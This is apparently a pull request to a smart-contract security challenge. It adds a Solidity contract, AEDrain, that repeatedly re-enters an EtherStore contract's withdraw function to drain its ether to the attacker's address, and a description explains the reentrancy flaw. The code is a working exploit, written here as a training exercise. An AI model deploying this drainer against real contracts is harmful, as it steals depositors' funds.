### PR TITLE
Reentrancy attack solution

### DIFF
--- a/Solutions/Challenge1/AEDrain.sol
+++ b/Solutions/Challenge1/AEDrain.sol
@@ -1,0 +1,36 @@
+//SPDX-License-Identifier: MIT
+pragma solidity ^0.8.25;
+
+interface EtherStore {
+    function deposit() external payable;
+    function withdraw() external;
+}
+
+/// @title AEDrain
+/// @notice This contract is used to drain the EtherStore contract through a Reentrancy vulnerability
+
+contract AEDrain {
+    EtherStore public etherStore;
+    address public owner;
+
+    constructor(address _etherStoreAddress) {
+        etherStore = EtherStore(_etherStoreAddress);
+        owner = msg.sender;
+    }
+
+    function attack() external payable {
+        require(msg.value >= 1 ether, "Deposit gt 1 ether to AEDrain EtherStore");
+
+        etherStore.deposit{value: 1 ether}();
+
+        etherStore.withdraw();
+    }
+
+    receive() external payable {
+        if (address(etherStore).balance >= 1 ether) {
+            etherStore.withdraw();
+        } else {
+            payable(owner).transfer(address(this).balance);
+        }
+    }
+}


### PR DESCRIPTION
The AEDrain contract will deposit 1 ether to the EtherStore contract and then withdraw the same amount.
It calls the receive function to withdraw the remaining balance from the EtherStore contract.
This is possible because the EtherStore contract uses the call function to send the ether to the user and then updates the user's balance creating a reentrancy loop.